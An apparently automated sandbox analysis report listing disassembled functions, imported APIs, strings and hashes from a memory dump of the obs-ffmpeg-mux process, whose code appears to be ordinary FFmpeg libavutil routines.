Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: ?$Assertion %s failed at %s:%d$[$cnt >= 0$src/libavutil/lzo.c
API String ID: 4206212132-2884727783
Opcode ID: 7011ca950fc2a7db3eb286879491971854b83ca07a450eddb1490616219303e7
Instruction ID: a317324767a189a2caeafdb4043b72bd91389bd0ed278b701f5de7dec01bff23
Opcode Fuzzy Hash: 7011ca950fc2a7db3eb286879491971854b83ca07a450eddb1490616219303e7
Instruction Fuzzy Hash: FCE11672B1F662A7EB608E11A144B7D6AA2FB447C0F958131CE4D07780EA7DF606E780

Function 00007FF8A7BEBE20 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 216COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BEC141

Strings

src/libavutil/channel_layout.c, xrefs: 00007FF8A7BEC116
ambisonic %d, xrefs: 00007FF8A7BEBF01
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BEC12D
channel_layout->order == AV_CHANNEL_ORDER_CUSTOM, xrefs: 00007FF8A7BEC11D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$ambisonic %d$channel_layout->order == AV_CHANNEL_ORDER_CUSTOM$src/libavutil/channel_layout.c
API String ID: 4206212132-610793534
Opcode ID: 4154b1103f2502a80824f1cfea4b5c08add524b0e9befcb9efd5374d9646e1ef
Instruction ID: 736b549178fef7aeb4e45e53534e3a2215a533883e69db762d05b65170e1e6a9
Opcode Fuzzy Hash: 4154b1103f2502a80824f1cfea4b5c08add524b0e9befcb9efd5374d9646e1ef
Instruction Fuzzy Hash: 6E7129F3F2994643E7254B34D80176D5182EF947E0F4CD235E90AD6B85EA2CE5829B41

Function 00007FF8A7C646C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C64707

Strings

src/libavutil/utils.c, xrefs: 00007FF8A7C646DC
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C646F3
(state[4] & 3) == 3, xrefs: 00007FF8A7C646E3
n, xrefs: 00007FF8A7C646FA

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: (state[4] & 3) == 3$Assertion %s failed at %s:%d$n$src/libavutil/utils.c
API String ID: 4206212132-3394967418
Opcode ID: f745146a8868629358c2eef4edc24f02b811a2bcba902581bbe48fb0424e79ec
Instruction ID: 5925a15c5381c954dafe1ab4907431e5c776cfa9ca2d49d278a4f8d67df20e59
Opcode Fuzzy Hash: f745146a8868629358c2eef4edc24f02b811a2bcba902581bbe48fb0424e79ec
Instruction Fuzzy Hash: 22217E6391E98256F7519E3C988427E72D2EB43BE5F951332E52AC25D0EF3CDB85D200

Function 00007FF8A7BEBA70 Relevance: 7.8, Strings: 6, Instructions: 250COMMON

Download Yara Rule

Strings

%d channels (, xrefs: 00007FF8A7BEBB71
USR%d, xrefs: 00007FF8A7BEBCE0
AMBI%d, xrefs: 00007FF8A7BEBDD8
%d channels, xrefs: 00007FF8A7BEBB5E
NONE, xrefs: 00007FF8A7BEBB96
@%s, xrefs: 00007FF8A7BEBC1D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
API String ID: 0-1306170362
Opcode ID: b58385b35ee8c0576a5674ace7b060eb4fb2608f8c8b053f2f6c87950b102242
Instruction ID: d742082da5c1132ff05691024952c9523479acfaf9a47d901418c1ebc5b6bfde
Opcode Fuzzy Hash: b58385b35ee8c0576a5674ace7b060eb4fb2608f8c8b053f2f6c87950b102242
Instruction Fuzzy Hash: 2E91E2F2F1A557A2EB298E15A841E7E2691EF44BD0F44C031DD0E47785ED2CA982F740

Function 00007FF8A7C8DAA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

pow, xrefs: 00007FF8A7C8DBCF, 00007FF8A7C8DCFE, 00007FF8A7C8E0AC

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: 4e4d1c9717f4655b5bbf70594396bdc5da546f85907a2c9caf3bda01d7e980ea
Instruction ID: ad3253eeb9ed91d3acb5b4118f4449af5ee6003786deda06ecba9f0f36533701
Opcode Fuzzy Hash: 4e4d1c9717f4655b5bbf70594396bdc5da546f85907a2c9caf3bda01d7e980ea
Instruction Fuzzy Hash: CCD1D822D0EA52B5F7625E25645037E6794EF5A3D0F208332EA8D361D9DF6DF881B380

Function 00007FF8A7C25B00 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C25E9A

Strings

src/libavutil/tx.c, xrefs: 00007FF8A7C25E6F
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C25E86
', xrefs: 00007FF8A7C25E8D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: '$Assertion %s failed at %s:%d$src/libavutil/tx.c
API String ID: 4206212132-3565471776
Opcode ID: ec47289fc772912451eea82ccb2b1043ae62ca5012e7b26885c9d820250d193f
Instruction ID: 7cb0b36817467d3b91d57c71483ab71b7199a33236187afcba7e0e81b6a7ac6f
Opcode Fuzzy Hash: ec47289fc772912451eea82ccb2b1043ae62ca5012e7b26885c9d820250d193f
Instruction Fuzzy Hash: 02A10672A0A68196D760DF18E5403BEB7A1FB887D4F545035EA4E83764EF3DE841DB40

Function 00007FF8A7BED5C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF8A7BED5CD
GetProcessAffinityMask.KERNEL32 ref: 00007FF8A7BED5E0

Strings

overriding to %d logical cores, xrefs: 00007FF8A7BED69D
detected %d logical cores, xrefs: 00007FF8A7BED6C3

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID: detected %d logical cores$overriding to %d logical cores
API String ID: 1231390398-3421371979
Opcode ID: 2e9904b101b569c18024893eab007079966040748388d549111c530203c0def7
Instruction ID: 1689dc2f56e2e3a7387cd6fea0b2fbda783f6e9ed604b1b6076feda429761ad4
Opcode Fuzzy Hash: 2e9904b101b569c18024893eab007079966040748388d549111c530203c0def7
Instruction Fuzzy Hash: 1D21C1A3B2A90617E7144E29EC0136D1292FB987A0F4DD136DA0EC7B95FD7CE602C341

Function 00007FF8A7BE1C30 Relevance: 4.2, APIs: 3, Instructions: 497COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7BE1EA6
memcpy.MSVCRT ref: 00007FF8A7BE1EBB

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 403baa3e1a488a5a0e7543da01e81e3aaffd6a2fe1ed6e15f3cbc0658172d83e
Instruction ID: db084ec03c3f68684de0ba84037f39e0ce36cbc662e01db52289ebfe06e1b92d
Opcode Fuzzy Hash: 403baa3e1a488a5a0e7543da01e81e3aaffd6a2fe1ed6e15f3cbc0658172d83e
Instruction Fuzzy Hash: 6032EFB2A0DBC096E7658F29E4403EEBBA1F795384F058126DBC943B56DB3CE165DB00

Function 00007FF8A7C90640 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C90754

Strings

__powi, xrefs: 00007FF8A7C90761

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: __powi
API String ID: 2918714741-2331859415
Opcode ID: 1ed4b1acd7149e56c63c0e5b63662fa1acdc3d18d69be49f294a8596855a1eb9
Instruction ID: fa6070f604dd55176af1927712dc1ea4d911a8a70b3d8489bcedce07031c5ef9
Opcode Fuzzy Hash: 1ed4b1acd7149e56c63c0e5b63662fa1acdc3d18d69be49f294a8596855a1eb9
Instruction Fuzzy Hash: 51517820E1EE47F5FBD64EA4996033A2364EFA67C8E149336D94D364C1EF1DA9C2A500

Function 00007FF8A7BE3B87 Relevance: 3.5, APIs: 2, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238db13e466d98e71d78f61cae172d4804caeca104bc3b3bb4d467ddbb97d8ec
Instruction ID: 80f0480e9535fa13cceff6a4ff83e0c27d721e0bc7464f3f120ca7c0307cc5f9
Opcode Fuzzy Hash: 238db13e466d98e71d78f61cae172d4804caeca104bc3b3bb4d467ddbb97d8ec
Instruction Fuzzy Hash: 2422B0B2A0E7D5A9D7208E15A0403FEB7A1FB85BC0F544135EA9D53789EF2CE542E701

Function 00007FF8A7BEB030 Relevance: 3.1, APIs: 2, Instructions: 87stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7BEAE10: strlen.MSVCRT ref: 00007FF8A7BEAE26
Part of subcall function 00007FF8A7BEAE10: memcmp.MSVCRT ref: 00007FF8A7BEAEA5

strtol.MSVCRT ref: 00007FF8A7BEB0F6
_errno.MSVCRT ref: 00007FF8A7BEB0FE

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errnomemcmpstrlenstrtol
String ID:
API String ID: 1078869015-0
Opcode ID: 4e62ed5a4916453a6424c7a293e756ef9a25259ab9570582f9bd8a4894d05afe
Instruction ID: e75a6d0fa2a6c260933a27e57d6db748f3e5c6a0a3c4ef7f0cfaa9ddf2af531e
Opcode Fuzzy Hash: 4e62ed5a4916453a6424c7a293e756ef9a25259ab9570582f9bd8a4894d05afe
Instruction Fuzzy Hash: C2217FB3B2A50653EB5C8925DC2233D52C39B947B0F4CC139DE0AC6785F93C99968702

Function 00007FF8A7C89720 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 00007FF8A7C89739
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A7C89760

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Time$FileInformationSystemZone
String ID:
API String ID: 2921752741-0
Opcode ID: a6735fc188ae2be04b6747e7321527e39212664d39bbfa2ed8a26b191bdbbc72
Instruction ID: a59717a95d1f357371eb225311622db58c17db1eb36db5a26792d9ba6faa0d99
Opcode Fuzzy Hash: a6735fc188ae2be04b6747e7321527e39212664d39bbfa2ed8a26b191bdbbc72
Instruction Fuzzy Hash: CF01D4B2B1854652EF68DF21F41037DA291EB547D4F08C131EA9E96798EF2CD445D700

Function 00007FF8A7C26350 Relevance: 1.7, Strings: 1, Instructions: 449COMMON

Download Yara Rule

Strings

%i: , xrefs: 00007FF8A7C2696A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %i:
API String ID: 0-3112360579
Opcode ID: 56225696255aec5cf75f5aaaa0dab9d34a63c7dc86180539428f912345232fc3
Instruction ID: fab2023514668f6b7ba95948a9b7cfe04e7f2c624554433edccd0da8386f6517
Opcode Fuzzy Hash: 56225696255aec5cf75f5aaaa0dab9d34a63c7dc86180539428f912345232fc3
Instruction Fuzzy Hash: 65020173A0AB9292DB24DF28C46027C73A0FB60B88F654135CB5D23B90DF79E951D790

Function 00007FF8A7C25350 Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8A7C25365, 00007FF8A7C2542D, 00007FF8A7C254AB, 00007FF8A7C25522, 00007FF8A7C2559D, 00007FF8A7C2561F, 00007FF8A7C25689, 00007FF8A7C256D4

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID: 0-399585960
Opcode ID: 32d18d1ae2b9536030ec3fb165465a0a39662cd1298dc4829aec3954e2195451
Instruction ID: 321f30f898c06f378f0805dbb8a520cc0fa5265464457eefad1f1169449157c8
Opcode Fuzzy Hash: 32d18d1ae2b9536030ec3fb165465a0a39662cd1298dc4829aec3954e2195451
Instruction Fuzzy Hash: 15E14B32A0968697E720AF16E480BAF77A4FB84BC4F514036DF8D43B55DE39E542DB80

Function 00007FF8A7C64840 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 00007FF8A7C64840

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: 0123456789abcdef
API String ID: 0-1757737011
Opcode ID: 067b04213758aebbec89ab64825b0ea9af463173314dc67680d0fe0a86fcad37
Instruction ID: 51e16081c6b482ad18476224c2e19a345c009c9c52e34290c1843add4c1ca93f
Opcode Fuzzy Hash: 067b04213758aebbec89ab64825b0ea9af463173314dc67680d0fe0a86fcad37
Instruction Fuzzy Hash: 4E61B8977292F19ED72247A9A810F9CBE56D266B45F1D4289D7C10BF93C212C0B2FB21

Function 00007FF8A7BEB150 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

%d channels, xrefs: 00007FF8A7BEB273

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

